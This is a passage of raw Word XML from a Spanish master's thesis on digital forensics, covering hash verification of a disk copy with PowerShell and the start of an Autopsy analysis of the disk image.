8Ri4iI&#10;iIiIiIj0F8WCa3KuMO+v6oiIiIiIiIiIDHRBjxN1PhERERERERERCRXV20REREREREREJJvvZlIo&#10;qLeJiIiIiIiIiEhaseyKrsyPERd4JYBScOWyax/8T+2IiIiIiIiIiAxYxULHrTq8Vt7PHSciIiIi&#10;IiIiMnBV7tFJAiUETOhnor4mIiIiIiIiIiIWOHGFjl4mhUKTf2WciIiIiIiIiMhA5n9VZ27QJHlV&#10;0ERERERERERExHqcECwp+oBJJWiiwImIiIiIiIiISJFf0/HhkqS3iYiIiIiIiIiIVPgeJ/wMcanj&#10;I4N6nYiIiIiIiIiIFCu9TXhbcGVe28f4seqBIiIiIiIiIiID3NxnnPhAiX3sGC0iIiIiIiIiMmAV&#10;CZh0/JpO0MukrB4nIiIiIiIiIjLApXqc8KZ9lIImIiIiIiIiIiKuWLIYSZmASfK+nUInIiIiIiIi&#10;IjLQ+R4nPnjCUE5+mpiRCp2IiIiIiIiIyABXLBSKrlBo8h/CZ5yIiIiIiIiIiAx0c38+p+Bc2b+Z&#10;G0gRERERERERERnIiuUkYlImhlJsf0+nEz/MjamIiIiIiIiIiAxEPjpSJlDi31Tel4KOKCIiIiIi&#10;IiIiA5UiJCIiIiIiIiIiVShwIiIiIiIiIiJSRfXAid2+IyIiIiIiIiIyQM0bONFPEouIiIiIiIiI&#10;eB2BEx4Kaw+JrcROFEARERERERERkYFNzzgREREREREREamiWCgUnP/Hq+9q0j4Uin6ciIiIiIiI&#10;iMhAph4nIiIiIiIiIiJVVA2c2PNOREREREREREQGKvU4ERERERERERGpovOv6iTvvU4fRERERERE&#10;REQGHvU4ERERERERERGpQoETEREREREREZEqFDgREREREREREamiI3BSKLcPyXsREREREREREVGP&#10;ExERERERERGRqhQ4ERERERERERGpQoETEREREREREZEqBlzgZNddd3XXXnut22yzzZIx/UNXtmvU&#10;qFHutNNOc2ussUYypv/qr/neKEofiUVZueKKK7pUXo488kj/dxdffPGAqHdEREREpH8YcIGThx56&#10;yI0cOdLtvffeyZj+oSvbddRRR7nddtvNHXvsscmYnvfEE0/4YE1v64v5zgkkQx5OMDlZ7Un9db/o&#10;73qjbIQIfJx++ulu8ODB7r333nNff/118k2cTz75xP/dyiuv7C677DIF6kRERERkgdDtwAknfpwM&#10;23DnnXf6q4n0ZjC8P+ecc9wDDzzgp+E1PU0su9oZLq/eE/EXXnjBbbrppjWveDLv9HxjT3Tnl5jt&#10;Ck2cONFNnjzZPfjgg8mYvolyQnkJy086bygXVibCITypjM33cKCs9eaJaRaCGZys9rR60idMk76+&#10;X/RnvVU2QLk4/PDD3TPPPOOOOeYYd8kll/j6wxAESdfNBx54YPJtBQE6/u64445zX375pTv77LO7&#10;dBwQEREREelNDelx8sUXX/iTb4apU6f6k6/zzz8/+bbSs2G77bbrCJj8+c9/duuss47bc889kyni&#10;0AjnJGHxxRd3V199tZ/XO++847bZZpvoYAGuv/56N3369H53db3e7Xr66af9CRAnM33ZWWed5cuU&#10;BeUoP/SUOeGEE5Ip5rrrrrv8NDa8+OKLyTfx6WPBpMcff9ytuuqqvsylTwD7o3rKz7bbbpu8k4Hi&#10;iCOO8K+XXnqpf00jCELdfNNNN/l9j2PB8ccfn1k3c8y49dZb3bBhw+Y5DgyU2wdFREREZMFRGLro&#10;UuXK27Ir+3f8r+zGrbGae/P1SYyoya40cwJu6F1CoIRxnIRmTdMVnDjPmDHDnXrqqb7hbbhiGX4G&#10;J9UHHHCAb8BnBQYYT/CGK6jpvwVXTDl55uqoSW8HyyUotOGGG3a6asqJww033JB8qpwIENzhJIFl&#10;EUCy77lyb1eMJ02a5F566SV/ks60nLifd955/rvYZeVtF9i2ULidseuD9HbdcccdPo8MJz8nn3yy&#10;f+WEnO9Yr3B5WdOwPIIjNk1W+WEbWL+TTjrJf7b1rpbfpt58J62vueYa/z4MntTKU8TkV9Z23Xzz&#10;zT4dGMcyCBBlSZfNvLywZXGrBPsm6DnASXCYDjHpM2XKFLf88sv79GCa9HYwDfu9fa6WN7XSkN4L&#10;F110UWb5Johmyw7LK58JpKa3KRbz3Guvvfy2gfJ12223+QAj8pYVu+/E5kWt9IktG41Mn7BsZmEf&#10;Dnug8JltJZh51VVXJWM7Y5tefvnljnUE49hm5vXss892yn8RERERkfmhqWXIQucm7zsQQBk9aqSb&#10;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&#10;SUEcNcTJYwqyyOV//uI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e2OY54DAAAzCAAADgAAAAAAAAAAAAAAAAA6AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAKAAAA&#10;AAAAACEA36N3/bmmAAC5pgAAFAAAAAAAAAAAAAAAAAAEBgAAZHJzL21lZGlhL2ltYWdlMS5wbmdQ&#10;SwECLQAUAAYACAAAACEATs7Pqt4AAAAHAQAADwAAAAAAAAAAAAAAAADvrAAAZHJzL2Rvd25yZXYu&#10;eG1sUEsBAi0AFAAGAAgAAAAhAKomDr68AAAAIQEAABkAAAAAAAAAAAAAAAAA+q0AAGRycy9fcmVs&#10;cy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAYABgB8AQAA7a4AAAAA&#10;">
                <v:shape id="Imagen 68" o:spid="_x0000_s1170" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:34112;height:11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PXbyQAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvQv/D8gq96UYxoUZXqaJE8VTbg8dH9pkNzb4N2VXjv+8WCh6HmfmGWax624gbdb52rGA8SkAQ&#10;l07XXCn4/toN30H4gKyxcUwKHuRhtXwZLDDX7s6fdDuFSkQI+xwVmBDaXEpfGrLoR64ljt7FdRZD&#10;lF0ldYf3CLeNnCRJJi3WHBcMtrQxVP6crlbBPhR4Pptyqg/H3XpbHA+PokqVenvtP+YgAvXhGf5v&#10;77WC2ThLk1mapfB3Kd4BufwFAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAy3j128kAAADi&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;">
                  <v:imagedata r:id="rId203" o:title="Texto&#10;&#10;Descripción generada automáticamente"/>
                </v:shape>
                <v:shape id="_x0000_s1171" type="#_x0000_t202" style="position:absolute;left:35300;top:3296;width:22733;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zBMyQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Pa8Iw&#10;FL8P/A7hCV7GTK1FpDOKyAZuF1nnZbdH82y6NS8lSbX79stgsOP7/X+b3Wg7cSUfWscKFvMMBHHt&#10;dMuNgvP788MaRIjIGjvHpOCbAuy2k7sNltrd+I2uVWxECuFQogITY19KGWpDFsPc9cSJuzhvMabT&#10;N1J7vKVw28k8y1bSYsupwWBPB0P1VzVYBafi42Tuh8vT675Y+pfzcFh9NpVSs+m4fwQRaYz/4j/3&#10;Uaf562We5cWiyOH3pwSA3P4AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAtj8wTMkAAADj&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="4FF67107" w14:textId="2A99C14F" w:rsidR="0058388E" w:rsidRPr="00A944F7" w:rsidRDefault="0058388E" w:rsidP="0058388E">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>45</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="115" w:name="_Toc155782612"/>
                        <w:r w:rsidRPr="00106E80">
                          <w:t>Calculo de Hash con PowerShell.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="115"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se puede observar en la siguiente imagen la respuesta de PowerShell de los hashes</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Hashes: Plural de hash</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A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de MD5 y SHA1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACFCBB0" w14:textId="455C88CF" w:rsidR="00A703AB" w:rsidRPr="009A067C" w:rsidRDefault="00915A6C" w:rsidP="009A067C">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251786240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="52A7ABC1" wp14:editId="7B1A82D8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>139344</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1858645" cy="635"/>
                <wp:effectExtent l="0" t="0" r="8255" b="3810"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="600064796" name="Cuadro de texto 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1858645" cy="635"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="6E67FAC3" w14:textId="15F76557" w:rsidR="00915A6C" w:rsidRPr="00D02E61" w:rsidRDefault="00915A6C" w:rsidP="00915A6C">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A7ABC1" id="_x0000_s1172" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:95.15pt;margin-top:10.95pt;width:146.35pt;height:.05pt;z-index:2517862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6BNGwIAAEAEAAAOAAAAZHJzL2Uyb0RvYy54bWysU8GO2jAQvVfqP1i+l8AWEIoIK8qKqhLa&#10;XYmt9mwch0RyPO7YkNCv79hJYLvtqerFmXjGbzzvPS/v21qzs0JXgcn4ZDTmTBkJeWWOGf/+sv20&#10;4Mx5YXKhwaiMX5Tj96uPH5aNTdUdlKBzhYxAjEsbm/HSe5smiZOlqoUbgVWGkgVgLTz94jHJUTSE&#10;XuvkbjyeJw1gbhGkco52H7okX0X8olDSPxWFU57pjNPdfFwxroewJqulSI8obFnJ/hriH25Ri8pQ&#10;0yvUg/CCnbD6A6quJIKDwo8k1AkURSVVnIGmmYzfTbMvhVVxFiLH2StN7v/Bysfz3j4j8+0XaEnA&#10;QEhjXepoM8zTFliHL92UUZ4ovFxpU61nMhxazBbz6YwzSbn551nASG5HLTr/VUHNQpBxJE0iVeK8&#10;c74rHUpCJwe6yreV1uEnJDYa2VmQfk1ZedWD/1alTag1EE51gGEnuc0RIt8eWlblGZ9OhyEPkF9o&#10;doTOFs7KbUUNd8L5Z4HkAxqXvO2faCk0NBmHPuKsBPz5t/1QT/JQlrOGfJVx9+MkUHGmvxkSLphw&#10;CHAIDkNgTvUGaNQJvRorY0gH0OshLBDqV7L8OnShlDCSemXcD+HGd+6mJyPVeh2LyGpW+J3ZWxmg&#10;B2Jf2leBtpfFk5qPMDhOpO/U6WqjPnZ98kR1lC4Q27HY8002jeL3Tyq8g7f/ser28Fe/AAAA//8D&#10;AFBLAwQUAAYACAAAACEANuXFqN4AAAAGAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMBBE70j8&#10;g7VIXBB1aqpCQ5yqquAAl4rQCzc33saBeB3FThv+nuUEtx3NaOZtsZ58J044xDaQhvksA4FUB9tS&#10;o2H//nz7ACImQ9Z0gVDDN0ZYl5cXhcltONMbnqrUCC6hmBsNLqU+lzLWDr2Js9AjsXcMgzeJ5dBI&#10;O5gzl/tOqixbSm9a4gVnetw6rL+q0WvYLT527mY8Pr1uFnfDy37cLj+bSuvrq2nzCCLhlP7C8IvP&#10;6FAy0yGMZKPoNPAjSYOar0Cwq1bqHsSBD5WBLAv5H7/8AQAA//8DAFBLAQItABQABgAIAAAAIQC2&#10;gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAG&#10;AAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAG&#10;AAgAAAAhABvLoE0bAgAAQAQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0A&#10;FAAGAAgAAAAhADblxajeAAAABgEAAA8AAAAAAAAAAAAAAAAAdQQAAGRycy9kb3ducmV2LnhtbFBL&#10;BQYAAAAABAAEAPMAAACABQAAAAA=&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="6E67FAC3" w14:textId="15F76557" w:rsidR="00915A6C" w:rsidRPr="00D02E61" w:rsidRDefault="00915A6C" w:rsidP="00915A6C">
                      <w:pPr>
                        <w:pStyle w:val="Descripcin"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:t xml:space="preserve">Como conclusión podemos verificar que la </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="001D7290">
        <w:t>integridad</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:instrText xml:space="preserve"> XE "Integridad: En informática, se refiere a la precisión y consistencia de los datos a lo largo de su ciclo de vida." </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="001D7290">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:t>de la copia facilitada para realizar el TFM no ha sido vulnerada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC0D0AE" w14:textId="77777777" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="661278DA" w14:textId="4E07D73F" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00857943">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc155782516"/>
      <w:r w:rsidRPr="00A703AB">
        <w:t>4.2.</w:t>
      </w:r>
      <w:r w:rsidR="00857943">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:t>Datos de interés del disco duro.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w14:paraId="6DB334A2" w14:textId="77777777" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EF72B35" w14:textId="787CD4E5" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La herramienta para utilizar en este caso será Autopsy</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Autopsy: Herramienta de análisis forense digital de código abierto.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A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4.21.0 para Windows. Arrancaremos la aplicación y generaremos un nuevo caso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BF1612" w14:textId="07EBDE8A" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Procedemos a la carga de datos y de la imagen de disco duro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097820C0" w14:textId="62919FD0" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
